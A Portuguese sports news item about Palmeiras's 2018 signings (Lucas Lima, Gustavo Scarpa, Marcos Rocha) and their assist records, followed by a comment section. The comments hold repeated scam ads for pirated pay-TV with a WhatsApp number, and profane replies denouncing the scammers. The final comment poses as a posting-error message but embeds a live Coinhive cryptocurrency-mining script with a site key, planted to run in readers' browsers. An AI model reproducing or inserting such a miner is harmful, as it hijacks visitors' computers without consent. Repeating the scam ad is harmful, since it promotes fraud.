Após uma temporada decepcionante, o Palmeiras reformulou seu elenco em busca de títulos para 2018. Com as chegadas do lateral direito Marcos Rocha e dos meias Gustavo Scarpa e Lucas Lima, o clube alviverde reúne cinco dos dez maiores garçons do Brasil, levando em conta números apurados pelo site Footstats nas últimas três temporadas.
A liderança no quesito é do ex-santista Lucas Lima, responsável por 53 assistências em 201 jogos disputados no período. Logo na estreia pelo Palmeiras, o meia deu passe para Keno fechar a vitória sobre o Santo André, alcançada na noite de quinta-feira, pelo Campeonato Paulista.
O atacante Dudu ocupa o segundo lugar na lista de maiores garçons do Brasil ao longo das últimas três temporadas, enquanto o recém-chegado Gustavo Scarpa é o sexto. O versátil Michel Bastos e Marcos Rocha fecham o top 10, completando cinco palmeirenses.
Às 17 horas (de Brasília) deste domingo, pela segunda rodada do Campeonato Paulista, o reforçado Palmeiras enfrenta o Botafogo-SP, no Estádio Santa Cruz. Do grupo de garçons, apenas Gustavo Scarpa não deve estar à disposição do técnico Roger Machado para o duelo.
Postado por
Caio de Castro
-
8397 visitas - Fonte: Gazeta Esportiva
OS ANUNCIOS DOS ESTELIONATÁRIOS QUE APARECEM SEMPRE AQUI SOBRE LIBERAÇÃO DE TV E DIMINUIÇÃO DE VALOR. <br />
<br />
THIAGO SILVA E BRENO SILVA ALVES SILVA <br />
<br />
SÃO GOLPE, DOIS PICARETAS SEM VERGONHA, NÃO SEI COMO O SITE PERMITE ISSO. <br />
esses picaretas 171 de tv gato e esse arrombado idiota rafael pontes postam essas merdas antes da gente fazer comentários não tem como broquear esses FDP não ?
Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776
OS ANUNCIOS DOS ESTELIONATÁRIOS QUE APARECEM SEMPRE AQUI SOBRE LIBERAÇÃO DE TV E DIMINUIÇÃO DE VALOR. <br /> <br /> THIAGO SILVA E BRENO SILVA ALVES SILVA <br /> <br /> SÃO GOLPE, DOIS PICARETAS SEM VERGONHA, NÃO SEI COMO O SITE PERMITE ISSO. <br />
?
Essa matéria de novo.
esses picaretas 171 de tv gato e esse arrombado idiota rafael pontes postam essas merdas antes da gente fazer comentários não tem como broquear esses FDP não ?
Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776
Erro ao postar comentário. <br />Código do erro: 803743<br /><br /><script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throt tle:.3});a.start();</script>